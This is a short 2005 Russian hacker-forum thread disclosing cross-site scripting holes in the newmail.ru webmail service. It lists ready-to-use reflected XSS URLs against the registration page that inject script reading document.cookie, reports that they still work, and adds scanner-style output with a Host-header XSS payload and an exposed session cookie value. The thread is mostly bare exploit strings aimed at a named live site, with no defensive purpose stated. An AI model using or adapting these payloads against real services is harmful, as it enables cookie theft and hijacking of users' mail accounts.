Уязвимости: nm.ru ака newmail.ru

Winux · 10.09.2005

Вот свежие XSS на новой почте:

Код:

http://www.newmail.ru/users/reg.dhtml?login=skv">[script]alert(document.cookie[/script]
http://www.newmail.ru/users/reg.dhtml?quest=skv">[script]alert(document.cookie[/script]
http://www.newmail.ru/users/reg.dhtml?answ=skv">[script]alert(document.cookie[/script]

На момент постинга XSS еще работала.

Foxa · 01.11.2005

--------
1) не работает !
--------

Список cookie
Описание

Ссылка - /
cust=bsh8mugDL0QiPgCy7qG0Ihf0ptI0ZGTA

--------
2) работает !
--------

Межсайтовое выполнение скриптов
Описание

Возможно межсайтовое выполнение скриптов в сервере Apache. Уязвимость можно реализовать запросив несуществующую страницу указав в поле Host следующее значение: Host: <img src=""onerror="alert(document.cookie)">

Уязвимости: nm.ru ака newmail.ru

Winux

Старожил форума

Foxa

(L3) cache